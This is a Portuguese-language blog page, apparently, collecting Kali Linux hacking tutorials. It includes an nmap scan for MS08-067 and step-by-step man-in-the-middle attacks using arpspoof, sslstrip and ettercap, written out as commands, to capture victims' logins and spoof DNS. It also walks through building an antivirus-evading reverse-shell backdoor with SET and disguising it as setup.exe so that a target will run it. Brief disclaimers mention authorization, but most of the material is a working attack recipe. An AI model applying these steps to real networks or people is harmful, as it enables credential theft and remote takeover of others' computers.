Maltego


Tutorial: Usando o Maltego para o levantamento de informações





Resolvendo problema do wpscan pós-atualização do Kali Linux

Resolvendo problema do wpscan pós-atualização do Kali Linux 

 Após a atualização no meu Kali Linux, ao tentar utilizar a ferramenta wpscan, apareceu esse problema: 




Após uma breve procura pelo google, eu achei a solução. Que é bem simples, basta você digitar esses comandos no seu terminal:
# apt-get install ruby1.9.1
# apt-get install ruby1.9.1-dev
# apt-get install --reinstall gem
# gem install bundler
# bundle install --gemfile=/usr/share/wpscan/Gemfile # apt-get update

----------------------------------------------------------------------------------------------------



Usando o nmap para verificação de vulnerabilidades
como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:
nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)



"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"

A resposta será algo parecido com isso informando se o alvo é vulnerável ou não

Host script results:
| smb-check-vulns:  
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: regsvc DoS: NOT VULNERABLE
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui

Usando sslstrip para capturar credenciais (MITM – Ethical Hacking)

Para realizar este ataque usei como “homem do meio” uma máquina com Kali Linux, uma distribuição Linux específica para pentest.
Caso precise de ajuda para instalação e configuração dessa ferramenta pode ver aqui

Para o meu teste tenho o seguinte cenário, para que você possa fazer o teste basta adaptar ao seu cenário.
IP da Vítima: 192.168.2.12
IP do default gateway 192.168.2.2
Vamos lá!
Usando o Kali Linux abra 4 terminais e deixe eles logados como “root” usando o comando “sudo su”. OBS: Creio que isso facilita para quem talvez não tenha muita experiência com linux, caso tenha experiência use os terminais como achar melhor.
Em um dos terminais digite o seguinte comando:
echo 1 > /proc/sys/net/ipv4/ip_forward (habilita o redirecionamento de pacotes)
No segundo terminal digite o seguinte o seguinte
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 1000 (redireciona os pacotes da porta 80 para porta 1000 da máquina do atacante)
No terceiro terminal digite
arpspoof -i eth0 -t 192.168.2.12 192.168.2.2 (Lembre-se de adaptar de acordo com seu ambiente, esse comando vai “envenenar” a tabela arp da vítima fazendo com que ele mande todo trafego que ia para o gateway para o atacante)
No quarto terminal digite o seguinte:
sslstrip -l 1000 (vai ler todos os dados na porta 1000)
De volta no primeiro terminal digite o seguinte:
ettercap -Tq -i eth0 (Aqui é onde vamos ver o que queremos)
Após esse passo a “vítima” deve acessar algum site que seja necessário autenticação, gmail, hotmail, facebook, twitter, etc…
Se tudo foi feito corretamente você vai ter uma tela semelhante a essa.

ScreenHunter_21 Apr. 22 18.56
Conforme pode se ver na imagem acima, marcado em vermelho, após a vítima fazer uma autenticação, será exibido o login e senha da pessoa.
Lembre-se que isso deve ser feito apenas em ambientes controlados ou com as devidas autorizações.

Usando Kali linux para fazer um ataque de DNS Spoofing com Ettercap

Esse tipo de ataque é muito importante para conseguirmos algumas credenciais durante a execução de um PenTest. Ele consiste em enviar respostas falsas a requisições de DNS que forem feitas.
Para executarmos esse ataque a primeira coisa que queremos é editar o arquivo etter.dns, basicamente ele é como o arquivo hosts do windows e linux, nele podemos configurar para onde as solicitações serão enviadas.
Vamos lá, abra um terminal e digite

# vi /usr/share/ettercap/etter.dns

ScreenHunter_23 Apr. 25 15.32
Podemos editar seguindo o padrão que pode ser visto na imagem acima, salve e saia e após digite ettercap -G que vai abrir o Ettercap em modo gráfico.
Vá em Sniff –> Unified Sniffing e quando solicitado escolha sua placa de rede eth0.
ScreenHunter_23 Apr. 25 15.38
Agora vá em “Hosts” e clique em “Scan for hosts”
Vá novamente em “Hosts” Clique em Host List para visualizar uma lista de todos IP’s disponíveis na rede, selecione qual será a vítima que vai receber as respostas falsas e clique em Add to Target 1
ScreenHunter_23 Apr. 25 15.41
Agora clique em Start –> Start Sniffing.
Após isso vá em MitM –> Arp Poisoning.
Selecione a opção Sniff remote connections conforme abaixo e clique em OK
ScreenHunter_23 Apr. 25 15.45
Agora vá em Plugins –> Manage the Plugins e de um duplo clique em dns_spoof
ScreenHunter_23 Apr. 25 15.47
Feito isso o cliente selecionado vai começar a receber respostas falsas de DNS.
Esse ataque é extremamente eficaz quando usado em conjunto com essa nossa dica aqui
-------------------------------------------------------------------------------------------------------------------------------------

Tutorial Kali Linux - Comandos Meterpreter


Tutorial Kali Linux - Criando um backdoor para controlar PC’s remotamente



Criando um backdoor para controlar PC’s remotamente


Hoje mostrarei como usar o SET (social engineering toolkit) disponível no Kali Linux para criarmos um backdoor que pode ser utilizado para controlar remotamente computadores Windows. Vamos criar um executável legítimo dificilmente detectado por algum antivírus, assim temos completo a um computador alvo.



obs: todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime.



Vamos lá !



Em primeiro lugar vamos acessar o menu Applications/Kali Linux/Exploitation Tools/Social Engineering Toolkit e clique em se-toolkit. Vai ser exibido um menu como esse abaixo visto na imagem. 




Neste menu de opções selecione a opção 1






 Nesse segundo menu selecione a opção 4





Nessa tela abaixo você deve informar corretamente o seu endereço ip, caso tenha dúvidas abra um novo terminal e digite ifconfig eth0 daí preencha corretamente esse campo.








Na tela abaixo, você deve escolher a segunda opção para criarmos uma conexão reversa, ou seja, a nosso computador alvo é quem fará a conexão ao atacante.








Na tela abaixo atente aos 3 passos que devemos tomar, primeiro no tipo de backdoor, digite o 16, na sequência devemos definir qual a portal local, na máquina do atacante, que ficará “escutando” as tentativas de conexão feitas pelo alvo, o padrão é a 443 daí é só digitar Enter, caso queira mudar a porta se ela já estiver sendo usada podemos digitar outro número e então dar enter, na sequência você é questionado se quer iniciar a escuta daí vc deve digitar :yes








Feito isso o backdoor será criado e nosso computador alvo começará a escutar as tentativas de conexão das máquinas alvo.

O executável criado fica na pasta /usr/share/set e se chama msf.exe

Devemos tornar ele um executável daí podemos abrir um novo terminal e digitar o seguinte comando



chmod +x /usr/share/set/msf.exe



Caso queira vc pode renomear esse arquivo para facilitar o processo de engenharia social, para convencer alguém a, por exemplo, instalar um programa novo. Ex: setup.exe



Agora precisa copiar esse executável para a máquina alvo e assim que ele for executado vai aparecer uma tela como essa abaixo.







Aqui ao digitar o comando sessions podemos listar os alvos já conectados.



Ao digitarmos sessions -i 1 (supondo que 1 seja o número da ID exibida através do comando sessions, caso outro número seja exibido basta trocar o 1 pelo número mostrado) vamos poder interagir com a máquina alvo tendo acesso completo a ela. Em breve publicarei algumas dicas de comandos que podem ser usados para explorar uma máquina alvo.



Espero que tenham gostado da dica e não esqueça de compartilhar. vlw!




Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...